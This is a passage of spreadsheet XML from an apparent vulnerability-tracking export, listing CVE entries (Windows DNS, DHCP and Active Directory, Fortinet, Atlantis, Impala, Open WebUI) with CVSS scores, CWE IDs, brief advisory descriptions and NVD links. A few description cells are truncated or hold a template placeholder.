          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1845" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64679</t>
        </is>
      </c>
      <c r="C1845" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1845" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1845" s="5" t="inlineStr"/>
      <c r="F1845" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1845" s="5" t="inlineStr"/>
      <c r="H1845" s="5" t="inlineStr"/>
      <c r="I1845" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J1845" s="5" t="inlineStr"/>
      <c r="K1845" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-73</t>
        </is>
      </c>
      <c r="L1845" s="5" t="inlineStr">
        <is>
          <t>Atlantis is a self-hosted golang application that listens for Terraform pull request events via webhooks. From 0.19.8 until 0.45.0, Atlantis does not consistently validate user-controlled workspace values supplied through accepted repository-level atlantis.yaml configuration or authenticated /api/plan input before joining them into local workspace paths. Traversal segments can escape the intended per-pull workspace directory and cause clone preparation or other working-directory code paths to call os.RemoveAll, os.MkdirAll, or related filesystem operations on out-of-bounds directories before Terraform rejects the invalid workspace name. This can create, delete, or reuse writable paths with the privileges of the Atlantis process, causing integrity loss or denial of service. This issue is fixed in version 0.45.0.</t>
        </is>
      </c>
      <c r="M1845" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64679</t>
        </is>
      </c>
    </row>
    <row r="1846">
      <c r="A1846" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1846" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65181</t>
        </is>
      </c>
      <c r="C1846" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1846" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1846" s="5" t="inlineStr"/>
      <c r="F1846" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1846" s="5" t="inlineStr">
        <is>
          <t>java, apache</t>
        </is>
      </c>
      <c r="H1846" s="5" t="inlineStr">
        <is>
          <t>apache:impala</t>
        </is>
      </c>
      <c r="I1846" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1846" s="5" t="inlineStr"/>
      <c r="K1846" s="5" t="inlineStr">
        <is>
          <t>CWE-913</t>
        </is>
      </c>
      <c r="L1846" s="5" t="inlineStr">
        <is>
          <t>Insufficient authorization of Data Source tables in Impala 2.7-4.5 allows a client with privileges to upload a file to remote storage and create a table to execute arbitrary Java code.
Users are recommended to upgrade to version 4.5.2, which fixes this issue.</t>
        </is>
      </c>
      <c r="M1846" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65181</t>
        </is>
      </c>
    </row>
    <row r="1847">
      <c r="A1847" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1847" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69325</t>
        </is>
      </c>
      <c r="C1847" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1847" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1847" s="5" t="inlineStr"/>
      <c r="F1847" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1847" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1847" s="5" t="inlineStr"/>
      <c r="I1847" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1847" s="5" t="inlineStr"/>
      <c r="K1847" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1847" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft JScript allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1847" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69325</t>
        </is>
      </c>
    </row>
    <row r="1848">
      <c r="A1848" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1848" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69380</t>
        </is>
      </c>
      <c r="C1848" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1848" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1848" s="5" t="inlineStr"/>
      <c r="F1848" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1848" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1848" s="5" t="inlineStr"/>
      <c r="I1848" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1848" s="5" t="inlineStr"/>
      <c r="K1848" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1848" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Microsoft Exchange Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1848" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69380</t>
        </is>
      </c>
    </row>
    <row r="1849">
      <c r="A1849" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1849" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69438</t>
        </is>
      </c>
      <c r="C1849" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1849" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1849" s="5" t="inlineStr"/>
      <c r="F1849" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1849" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1849" s="5" t="inlineStr"/>
      <c r="I1849" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1849" s="5" t="inlineStr"/>
      <c r="K1849" s="5" t="inlineStr">
        <is>
          <t>CWE-681</t>
        </is>
      </c>
      <c r="L1849" s="5" t="inlineStr">
        <is>
          <t>Incorrect conversion between numeric types in Microsoft JScript allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1849" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69438</t>
        </is>
      </c>
    </row>
    <row r="1850">
      <c r="A1850" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1850" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69510</t>
        </is>
      </c>
      <c r="C1850" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1850" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1850" s="5" t="inlineStr"/>
      <c r="F1850" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1850" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1850" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I1850" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1850" s="5" t="inlineStr"/>
      <c r="K1850" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L1850" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1850" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69510</t>
        </is>
      </c>
    </row>
    <row r="1851">
      <c r="A1851" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1851" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69524</t>
        </is>
      </c>
      <c r="C1851" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1851" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1851" s="5" t="inlineStr"/>
      <c r="F1851" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1851" s="5" t="inlineStr">
        <is>
          <t>active directory</t>
        </is>
      </c>
      <c r="H1851" s="5" t="inlineStr"/>
      <c r="I1851" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1851" s="5" t="inlineStr"/>
      <c r="K1851" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1851" s="5" t="inlineStr">
        <is>
          <t>Use after free in Active Directory Domain Services allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1851" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69524</t>
        </is>
      </c>
    </row>
    <row r="1852">
      <c r="A1852" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1852" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69530</t>
        </is>
      </c>
      <c r="C1852" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1852" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1852" s="5" t="inlineStr"/>
      <c r="F1852" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1852" s="5" t="inlineStr"/>
      <c r="H1852" s="5" t="inlineStr"/>
      <c r="I1852" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1852" s="5" t="inlineStr"/>
      <c r="K1852" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1852" s="5" t="inlineStr">
        <is>
          <t>Use after free in Reliable Multicast Transport Driver (RMCAST) allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1852" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69530</t>
        </is>
      </c>
    </row>
    <row r="1853">
      <c r="A1853" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1853" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69546</t>
        </is>
      </c>
      <c r="C1853" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1853" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1853" s="5" t="inlineStr"/>
      <c r="F1853" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1853" s="5" t="inlineStr">
        <is>
          <t>active directory</t>
        </is>
      </c>
      <c r="H1853" s="5" t="inlineStr"/>
      <c r="I1853" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1853" s="5" t="inlineStr"/>
      <c r="K1853" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1853" s="5" t="inlineStr">
        <is>
          <t>Use after free in Active Directory Domain Services allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1853" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69546</t>
        </is>
      </c>
    </row>
    <row r="1854">
      <c r="A1854" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1854" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69620</t>
        </is>
      </c>
      <c r="C1854" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1854" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1854" s="5" t="inlineStr"/>
      <c r="F1854" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1854" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1854" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I1854" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1854" s="5" t="inlineStr"/>
      <c r="K1854" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L1854" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1854" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69620</t>
        </is>
      </c>
    </row>
    <row r="1855">
      <c r="A1855" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1855" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69680</t>
        </is>
      </c>
      <c r="C1855" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1855" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1855" s="5" t="inlineStr"/>
      <c r="F1855" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1855" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1855" s="5" t="inlineStr"/>
      <c r="I1855" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1855" s="5" t="inlineStr"/>
      <c r="K1855" s="5" t="inlineStr">
        <is>
          <t>CWE-346</t>
        </is>
      </c>
      <c r="L1855" s="5" t="inlineStr">
        <is>
          <t>Origin validation error in Windows DNS allows an unauthorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="M1855" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69680</t>
        </is>
      </c>
    </row>
    <row r="1856">
      <c r="A1856" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1856" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69732</t>
        </is>
      </c>
      <c r="C1856" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1856" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1856" s="5" t="inlineStr"/>
      <c r="F1856" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1856" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1856" s="5" t="inlineStr"/>
      <c r="I1856" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1856" s="5" t="inlineStr"/>
      <c r="K1856" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1856" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="M1856" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69732</t>
        </is>
      </c>
    </row>
    <row r="1857">
      <c r="A1857" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1857" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69782</t>
        </is>
      </c>
      <c r="C1857" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1857" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1857" s="5" t="inlineStr"/>
      <c r="F1857" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1857" s="5" t="inlineStr"/>
      <c r="H1857" s="5" t="inlineStr"/>
      <c r="I1857" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1857" s="5" t="inlineStr"/>
      <c r="K1857" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="L1857" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in DNS Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1857" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69782</t>
        </is>
      </c>
    </row>
    <row r="1858">
      <c r="A1858" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1858" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69786</t>
        </is>
      </c>
      <c r="C1858" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1858" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1858" s="5" t="inlineStr"/>
      <c r="F1858" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1858" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1858" s="5" t="inlineStr"/>
      <c r="I1858" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1858" s="5" t="inlineStr"/>
      <c r="K1858" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1858" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="M1858" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69786</t>
        </is>
      </c>
    </row>
    <row r="1859">
      <c r="A1859" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1859" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69813</t>
        </is>
      </c>
      <c r="C1859" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1859" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1859" s="5" t="inlineStr"/>
      <c r="F1859" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1859" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1859" s="5" t="inlineStr"/>
      <c r="I1859" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1859" s="5" t="inlineStr"/>
      <c r="K1859" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1859" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1859" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69813</t>
        </is>
      </c>
    </row>
    <row r="1860">
      <c r="A1860" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1860" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69827</t>
        </is>
      </c>
      <c r="C1860" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1860" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1860" s="5" t="inlineStr"/>
      <c r="F1860" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1860" s="5" t="inlineStr"/>
      <c r="H1860" s="5" t="inlineStr"/>
      <c r="I1860" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1860" s="5" t="inlineStr"/>
      <c r="K1860" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="L1860" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in DNS Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1860" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69827</t>
        </is>
      </c>
    </row>
    <row r="1861">
      <c r="A1861" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1861" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69858</t>
        </is>
      </c>
      <c r="C1861" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1861" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1861" s="5" t="inlineStr"/>
      <c r="F1861" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1861" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1861" s="5" t="inlineStr"/>
      <c r="I1861" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1861" s="5" t="inlineStr"/>
      <c r="K1861" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1861" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1861" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69858</t>
        </is>
      </c>
    </row>
    <row r="1862">
      <c r="A1862" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1862" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69989</t>
        </is>
      </c>
      <c r="C1862" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1862" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1862" s="5" t="inlineStr"/>
      <c r="F1862" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1862" s="5" t="inlineStr"/>
      <c r="H1862" s="5" t="inlineStr"/>
      <c r="I1862" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1862" s="5" t="inlineStr"/>
      <c r="K1862" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1862" s="5" t="inlineStr">
        <is>
          <t>Use after free in DNS Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1862" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69989</t>
        </is>
      </c>
    </row>
    <row r="1863">
      <c r="A1863" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1863" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70342</t>
        </is>
      </c>
      <c r="C1863" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1863" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1863" s="5" t="inlineStr"/>
      <c r="F1863" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G1863" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1863" s="5" t="inlineStr"/>
      <c r="I1863" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1863" s="5" t="inlineStr"/>
      <c r="K1863" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1863" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Ancillary Function Driver for WinSock allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1863" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70342</t>
        </is>
      </c>
    </row>
    <row r="1864">
      <c r="A1864" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1864" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70465</t>
        </is>
      </c>
      <c r="C1864" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1864" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1864" s="5" t="inlineStr"/>
      <c r="F1864" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1864" s="5" t="inlineStr">
        <is>
          <t>windows, fortinet</t>
        </is>
      </c>
      <c r="H1864" s="5" t="inlineStr">
        <is>
          <t>fortinet:forticlient</t>
        </is>
      </c>
      <c r="I1864" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J1864" s="5" t="inlineStr"/>
      <c r="K1864" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="L1864" s="5" t="inlineStr">
        <is>
          <t>A buffer copy without checking size of input ('classic buffer overflow') vulnerability in Fortinet FortiClientWindows 7.4.0 through 7.4.3, FortiClientWindows 7.2.0 through 7.2.11 may allow an unauthenticated attacker in a position to alter or craft DNS responses to the targeted host to execute arbitrary code via malicious packets.</t>
        </is>
      </c>
      <c r="M1864" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70465</t>
        </is>
      </c>
    </row>
    <row r="1865">
      <c r="A1865" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1865" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70468</t>
        </is>
      </c>
      <c r="C1865" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1865" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1865" s="5" t="inlineStr"/>
      <c r="F1865" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1865" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="H1865" s="5" t="inlineStr">
        <is>
          <t>fortinet:fortimanager, fortinet:fortimanager_cloud</t>
        </is>
      </c>
      <c r="I1865" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J1865" s="5" t="inlineStr"/>
      <c r="K1865" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="L1865" s="5" t="inlineStr">
        <is>
          <t>A authentication bypass using an alternate path or channel vulnerability in Fortinet FortiManager 7.6.1, FortiManager 7.4.3 through 7.4.5, FortiManager 7.2.5 through 7.2.9, FortiManager Cloud 7.6.1, FortiManager Cloud 7.4.3 through 7.4.5, FortiManager Cloud 7.2.5 through 7.2.9 may allow attacker to improper access control via &lt;insert attack vector here&gt;</t>
        </is>
      </c>
      <c r="M1865" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70468</t>
        </is>
      </c>
    </row>
    <row r="1866">
      <c r="A1866" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1866" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70482</t>
        </is>
      </c>
      <c r="C1866" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1866" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1866" s="5" t="inlineStr"/>
      <c r="F1866" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1866" s="5" t="inlineStr"/>
      <c r="H1866" s="5" t="inlineStr"/>
      <c r="I1866" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J1866" s="5" t="inlineStr"/>
      <c r="K1866" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L1866" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.8.0 until 0.11.0, when ENABLE_OAUTH_TOKEN_EXCHANGE=True, /oauth/{provider}/token/exchange accepts a raw provider access token and validates it by calling the provider userinfo endpoint without confirming which OAuth client the token was issued to. Anyone holding an access token minted for any client registered with the same provider could exchange it for an Open WebUI session as that token user, including applications the operator does not control and has never authorized. This issue is fixed in 0.11.0.</t>
        </is>
      </c>
      <c r="M1866" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70482</t>
        </is>
      </c>
    </row>
    <row r="1867">
      <c r="A1867" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1867" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70494</t>
        </is>
      </c>
      <c r="C1867" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1867" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1867" s="5" t="inlineStr"/>
      <c r="F1867" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1867" s="5" t="inlineStr"/>
      <c r="H1867" s="5" t="inlineStr"/>
      <c r="I1867" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J1867" s="5" t="inlineStr"/>
      <c r="K1867" s="5" t="inlineStr">
        <is>
          <t>CWE-862, CWE-863</t>
        </is>
      </c>
      <c r="L1867" s="5" t="inlineStr">
        <is>
